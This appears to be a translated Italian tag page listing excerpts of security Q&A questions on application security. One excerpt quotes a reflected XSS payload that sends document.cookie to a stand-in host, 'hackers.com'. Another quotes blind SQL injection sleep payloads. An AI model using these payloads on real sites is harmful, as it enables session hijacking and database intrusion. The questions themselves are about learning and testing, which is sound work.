Domande con tag 'appsec'

domande con tag
1
risposta

Quale responsabilità ho nel continuare il lavoro di un altro sviluppatore?

La mia domanda è correlata a questa. Non ho trovato niente su Google e questo è il motivo per cui ti sto chiedendo. Questa domanda Sono l'unico sviluppatore web di un'azienda, e gestisco tutto, dall'installazione di cavi a un'app web mol...
posta 18.12.2012 - 12:09
3
risposte

Come valutare le librerie Open Source?

Esiste qualche tipo di strumento di scansione automatico che rileva le minacce nelle librerie Java Open Source? Penso che il progetto Orizon di OWASP abbia cercato di costruire uno strumento del genere, ma sembra essere inattivo da anni. I...
posta 05.03.2012 - 13:00
2
risposte

Il Javascript pericoloso nel file HTML locale può inviare file a Internet in Firefox / Chrome?

Scarica example.html -file dal sito web casuale sul desktop del mio computer Apri example.html -file dal desktop con Google Chrome Ora Chrome esegue javascript da example.html -file che cerca nei file del computer da desktop o documenti -di...
posta 13.01.2018 - 00:19
2
risposte

Quali sono i rischi per la sicurezza del bus di servizio e come li mitigate?

Il bus di servizio è un software che può essere installato su Windows o noleggiato in Azure e consente a qualcuno di ritrasmettere informazioni SOAP / WCF su Internet sotto forma di un carico utile XML su HTTPS. Un rischio che vedo è che...
posta 22.11.2010 - 20:56
1
risposta

Attacco XSS riflesso tramite richiesta POST e payload XML

So che un XSS riflesso può essere fatto con una richiesta GET come: http://site.com?search=<script>location.href='http://hackers.com?sessionToken='+document.cookie;</script> Finché la risposta è simile a questa: <html>...
posta 15.09.2013 - 22:30
3
risposte

Come si può rilevare se Apple / Google / etc. ha modificato un'applicazione di terzi distribuita tramite i loro App Store?

Esistono metodi realistici per verificare che Apple o chiunque non abbia manomesso un'applicazione di terzi distribuita tramite il loro App Store? Potresti per esempio avere un'applicazione open source con sviluppatori situati in più giurisdi...
posta 04.12.2011 - 22:56
3
risposte

Lunghezza del token CSRF

Esiste una lunghezza standard del token che dovrebbe essere utilizzata durante la generazione dei token casuali? Dovremmo usare lo stesso standard che usiamo per generare ID di sessione?     
posta 08.09.2011 - 21:52
3
risposte

C'è un modo per usare Nuget in modo sicuro?

Visual Studio ora include un gestore di pacchetti che scarica e aggiorna i pacchetti software da Internet. Il nome comune per questo è "Nuget" Il problema che ho è che chiunque può fingere di essere qualcun altro, spoofing del campo propriet...
posta 04.10.2011 - 06:06
2
risposte

E 'possibile testare l'iniezione di Postgres BlindSQL usando pg_sleep () in una clausola WHERE?

In mysql, ho familiarità con l'utilizzo dei seguenti payload per testare per blindsql quando la clausola WHERE è vulnerabile ( tutti gli esempi di payload da fuzzdb ): 1 or sleep(TIME)# " or sleep(TIME)# ' or sleep(TIME)# In postgres,...
posta 09.09.2011 - 22:19
3
risposte

Esistono strumenti per rilevare chiamate WCF / AJAX basate su JavaScript?

Vorrei determinare se un determinato JavaScript contiene la logica per effettuare una chiamata AJAX / WCF o determinare se uno viene eseguito in fase di runtime. Esiste qualcosa di simile?     
posta 07.12.2010 - 04:55